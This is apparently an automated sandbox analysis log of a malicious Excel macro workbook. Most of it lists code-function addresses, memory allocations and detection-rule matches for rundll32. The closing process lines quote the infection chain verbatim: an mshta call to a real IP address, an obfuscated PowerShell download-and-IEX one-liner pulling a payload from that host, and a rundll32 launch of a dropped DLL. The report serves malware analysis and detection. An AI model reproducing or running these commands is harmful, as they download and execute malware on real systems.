                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00779B8311_2_00779B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00784B8711_2_00784B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00774C5D11_2_00774C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00786C4911_2_00786C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00777C3711_2_00777C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078AC3A11_2_0078AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00773C3C11_2_00773C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00790C1411_2_00790C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078DCF711_2_0078DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00785CC411_2_00785CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00776D2411_2_00776D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00786DF811_2_00786DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00787DD511_2_00787DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00779DCF11_2_00779DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078AE6D11_2_0078AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00775E6011_2_00775E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00780E5311_2_00780E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00790E3A11_2_00790E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00773E3F11_2_00773E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078BE2711_2_0078BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077AEFB11_2_0077AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00789EEC11_2_00789EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00774EE311_2_00774EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0078DEDC11_2_0078DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077EE8111_2_0077EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077CF4711_2_0077CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00790F3311_2_00790F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0077DFF311_2_0077DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00777FF211_2_00777FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00213C3C12_2_00213C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021901112_2_00219011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022044F12_2_0022044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002220BA12_2_002220BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021F8FD12_2_0021F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021D6D812_2_0021D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022473C12_2_0022473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022411612_2_00224116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002313AD12_2_002313AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021AB8712_2_0021AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00217FF212_2_00217FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002159F212_2_002159F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002295FA12_2_002295FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022BE2712_2_0022BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022AA3012_2_0022AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022C63112_2_0022C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00217C3712_2_00217C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022F43512_2_0022F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022AC3A12_2_0022AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00230E3A12_2_00230E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00213E3F12_2_00213E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022000112_2_00220001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022860612_2_00228606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00230C1412_2_00230C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021481612_2_00214816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00215E6012_2_00215E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022A66612_2_0022A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022AE6D12_2_0022AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022907F12_2_0022907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00226C4912_2_00226C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021205112_2_00212051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021225112_2_00212251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00220E5312_2_00220E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0023005612_2_00230056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00211A5612_2_00211A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00214C5D12_2_00214C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002170B312_2_002170B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021EE8112_2_0021EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022188912_2_00221889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021EA9912_2_0021EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021F09B12_2_0021F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00214EE312_2_00214EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002164E212_2_002164E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022A2E812_2_0022A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00229EEC12_2_00229EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022DCF712_2_0022DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021AEFB12_2_0021AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021B2C712_2_0021B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00225CC412_2_00225CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002266CA12_2_002266CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021E2CC12_2_0021E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022DEDC12_2_0022DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022BB2312_2_0022BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00216D2412_2_00216D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00230F3312_2_00230F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021773512_2_00217735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00218B3D12_2_00218B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021971412_2_00219714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022851912_2_00228519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00220B1912_2_00220B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021536112_2_00215361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021896912_2_00218969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022176B12_2_0022176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021BB7E12_2_0021BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021CF4712_2_0021CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021434612_2_00214346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021554812_2_00215548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022894B12_2_0022894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021B74D12_2_0021B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022255012_2_00222550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022CB5B12_2_0022CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021A55F12_2_0021A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022C3A012_2_0022C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00227BA612_2_00227BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002309B512_2_002309B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002181B712_2_002181B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002151BB12_2_002151BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00219B8312_2_00219B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00224B8712_2_00224B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022D38912_2_0022D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021E99112_2_0021E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022E39512_2_0022E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00228BE312_2_00228BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022DBEA12_2_0022DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021DFF312_2_0021DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00226DF812_2_00226DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00229BCF12_2_00229BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00219DCF12_2_00219DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021E5CF12_2_0021E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00227DD512_2_00227DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00212BD912_2_00212BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030F8FD15_2_0030F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030E99115_2_0030E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030AB8715_2_0030AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031C63115_2_0031C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031AA3015_2_0031AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031F43515_2_0031F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00307C3715_2_00307C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00320E3A15_2_00320E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031AC3A15_2_0031AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00303C3C15_2_00303C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00303E3F15_2_00303E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031BE2715_2_0031BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030901115_2_00309011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030481615_2_00304816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00320C1415_2_00320C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031000115_2_00310001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031860615_2_00318606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031907F15_2_0031907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00305E6015_2_00305E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031A66615_2_0031A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031AE6D15_2_0031AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030205115_2_00302051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030225115_2_00302251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00310E5315_2_00310E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0032005615_2_00320056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00301A5615_2_00301A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00304C5D15_2_00304C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00316C4915_2_00316C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031044F15_2_0031044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003070B315_2_003070B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003120BA15_2_003120BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030EA9915_2_0030EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030F09B15_2_0030F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030EE8115_2_0030EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031188915_2_00311889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031DCF715_2_0031DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030AEFB15_2_0030AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003064E215_2_003064E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00304EE315_2_00304EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031A2E815_2_0031A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00319EEC15_2_00319EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030D6D815_2_0030D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031DEDC15_2_0031DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00315CC415_2_00315CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030B2C715_2_0030B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003166CA15_2_003166CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030E2CC15_2_0030E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00320F3315_2_00320F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030773515_2_00307735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031473C15_2_0031473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00308B3D15_2_00308B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031BB2315_2_0031BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00306D2415_2_00306D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030971415_2_00309714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031411615_2_00314116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031851915_2_00318519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00310B1915_2_00310B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030BB7E15_2_0030BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030536115_2_00305361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030896915_2_00308969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031176B15_2_0031176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031255015_2_00312550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031CB5B15_2_0031CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030A55F15_2_0030A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030434615_2_00304346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030CF4715_2_0030CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030554815_2_00305548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031894B15_2_0031894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030B74D15_2_0030B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003209B515_2_003209B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003081B715_2_003081B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003051BB15_2_003051BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031C3A015_2_0031C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00317BA615_2_00317BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003213AD15_2_003213AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031E39515_2_0031E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00309B8315_2_00309B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00314B8715_2_00314B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031D38915_2_0031D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00307FF215_2_00307FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003059F215_2_003059F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030DFF315_2_0030DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00316DF815_2_00316DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003195FA15_2_003195FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00318BE315_2_00318BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031DBEA15_2_0031DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00317DD515_2_00317DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00302BD915_2_00302BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00319BCF15_2_00319BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00309DCF15_2_00309DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030E5CF15_2_0030E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002C000116_2_002C0001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002B901116_2_002B9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002CAE6D16_2_002CAE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002CA66616_2_002CA666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002C907F16_2_002C907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002C044F16_2_002C044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002C20BA16_2_002C20BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002BEE8116_2_002BEE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002CA2E816_2_002CA2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002B64E216_2_002B64E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002BF8FD16_2_002BF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002BE2CC16_2_002BE2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002B6D2416_2_002B6D24
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: NZW-010122 BNUV-280122.xlsmMacro extractor: Sheet name: LINKO
                            Source: NZW-010122 BNUV-280122.xlsmMacro extractor: Sheet name: LINKO
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021E249 DeleteService,12_2_0021E249
                            Source: NZW-010122 BNUV-280122.xlsm, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Svccveo\Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: NZW-010122 BNUV-280122.xlsmOLE indicator, VBA macros: true
                            Source: NZW-010122 BNUV-280122.xls.0.drOLE indicator, VBA macros: true
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$NZW-010122 BNUV-280122.xlsmJump to behavior
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@21/12@2/48
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: NZW-010122 BNUV-280122.xlsmOLE indicator, Workbook stream: true
                            Source: NZW-010122 BNUV-280122.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,9_2_100125C0
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................P...............................P.......................`I.........v.....................K........Z.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............y=.w....................?E9k....................................}..v............0.................".............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................?E9k..... ..............................}..v....`.......0.................Z.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............y=.w.....................D9k....................................}..v............0.................".............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................D9k....x.Z.............................}..v....0.......0.................Z.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..".............y=.w....#.............../D9k....................................}..v....H.......0.................".............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.............../D9k....(.Z.............................}..v............0.................Z.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'..............._l9k....E...............................}..v............0...............x.Z.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+..............._l9k....E...............................}..v............0...............x.Z.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............(.......:.......................Jump to behavior
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
